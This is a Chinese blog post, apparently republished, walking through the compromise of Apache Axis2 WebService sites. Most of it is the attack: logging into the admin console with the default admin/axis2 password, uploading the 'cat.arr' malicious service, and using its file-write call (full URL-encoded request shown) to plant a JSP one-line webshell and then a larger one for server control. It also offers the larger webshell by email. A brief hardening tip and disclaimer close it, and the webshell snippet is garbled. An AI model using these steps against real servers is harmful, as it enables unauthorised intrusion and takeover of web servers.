博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用Axis2默认口令安全漏洞可入侵WebService网站
阅读量:6270 次
发布时间:2019-06-22

本文共 1686 字,大约阅读时间需要 5 分钟。

利用
Axis2默认口令安全漏洞可入侵WebService网站

近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。

乌云Axis2默认口令安全弱点利用案例:

航空安全之四川航空某导致Getshell(影响内网60多台主机安全\目测已被其他人渗透过)

乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)

中国科学院网Web-services(axis2)系统任意代码执行

工具准备:

Axis2利用工具包: cat.arr

cat.arr工具说明与参见大牛“ to ”的博客http://javaweb.org/?p=1548

JSP一句话木马

服务器端一句话木马代码:

<%if(request.getparameter(“f”)!=null)(new>

<%if(request.getparameter(“f”)!=null)(new>

客户端提交代码:

jsp?f=大木马.jsp”" method="”post”"> your code

 

 

JSP大马

大马我就不发布出来了,如有需要可发我QQ邮箱2749958485@qq.com索要。

 

URL编码工具

我用的是小葵转码,也可以利用网上在线的转码工具

 

渗透流程:

第一步,确认目标WebService网站后台URL地址。

我在本地搭建的后台地址为 http://10.10.10.138:8080/axis2/axis2-admin/ , 按照webservice的部署经验,直接部署在根目录下的网站也比较多,则后台地址多为 http://*.*.*:8080/axis2-web/ 。点击Administration 进入Axis2后台登录界面,输入默认口令admin/axis2,若口令没有被更改则可成功进入后台管理界面。wKioL1bWtLyQRfLlAAH3i3n3zwQ584.jpg

wKiom1bWtN-y-PLAAAHhXk1sCvQ506.jpg

wKiom1bWtbGB2DZgAALNV1eXEuY737.jpg第二步,点击左侧“Upload Service”上传cat.arr,这个arr包实际上是个中马,我们主要利用这个网马的获取web应用路径、写入文件这两个功能。

cat工具上传成功之后,点击左侧“Available Service”可以看到上传的service项“Cat”。

在客户端利用这个网马的getClassPath功能获取当前应用路径

http://10.10.10.137:8080/axis2/services/Cat/getClassPath

wKiom1bWvVSTrEPSAAFMaaNWPTU920.jpg利用文件写入功能往获取的web应用路径下写入服务器端JSP一句话木马,注意此处需要将一句话木马代码先转码成URL编码,另外在URL中添加内容的时候注意不准换行,复制黏贴时要特别注意。

http://10.10.10.137:8080/axis2/services/Cat/writeStringToFile?data=%253C%25if%28request.getParameter%28%25E2%2580%259Cf%25E2%2580%259D%29!%3Dnull%29%28new%2520java.io.Fil&file=/C:/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/webapps/axis2/1.jsp&encoding=utf-8&append=false

wKiom1bWvrTRTP-wAAElw4UtVK0568.jpg

第三步,利用JSP一句话木马的客户端提交代码写入JSP大马。在提交表单中填入JSP大马代码,点击提交即可。此处注意自行修改客户端提交代码中的JSP一句话木马文件路径以及要写入的JSP大马文件名。

 

wKiom1bWv87BVXSBAADq9h42qiE546.jpg第四步,访问上传的大马,即可获得web应用服务器控制权限。

 

wKiom1bWwaejpBGDAAPV62V2aZE162.jpg

 

安全加固方法:

修改Axis2默认账户名与口令,具体位置在axis2中的conf.xml文档中,修改如下两行代码。

admin

axis2

 

【后记】:写本篇文章主要是想说明Axis2默认账户口令的危害,希望大家不要滥用文章中涉及到的渗透技术,共同建立一个良好的信息安全环境。

你可能感兴趣的文章
App 卸载记录
查看>>
南京大学周志华教授当选欧洲科学院外籍院士
查看>>
计算机网络与Internet应用
查看>>
Django 文件下载功能
查看>>
走红日本 阿里云如何能够赢得海外荣耀
查看>>
磁盘空间满引起的mysql启动失败:ERROR! MySQL server PID file could not be found!
查看>>
点播转码相关常见问题及排查方式
查看>>
[arm驱动]linux设备地址映射到用户空间
查看>>
弗洛伊德算法
查看>>
【算法之美】求解两个有序数组的中位数 — leetcode 4. Median of Two Sorted Arrays
查看>>
精度 Precision
查看>>
Android——4.2 - 3G移植之路之 APN (五)
查看>>
Linux_DHCP服务搭建
查看>>
[SilverLight]DataGrid实现批量输入(like Excel)(补充)
查看>>
秋式广告杀手:广告拦截原理与杀手组织
查看>>
翻译 | 摆脱浏览器限制的JavaScript
查看>>
闲扯下午引爆乌云社区“盗窃”乌云币事件
查看>>
02@在类的头文件中尽量少引入其他头文件
查看>>
JAVA IO BIO NIO AIO
查看>>
input checkbox 复选框大小修改
查看>>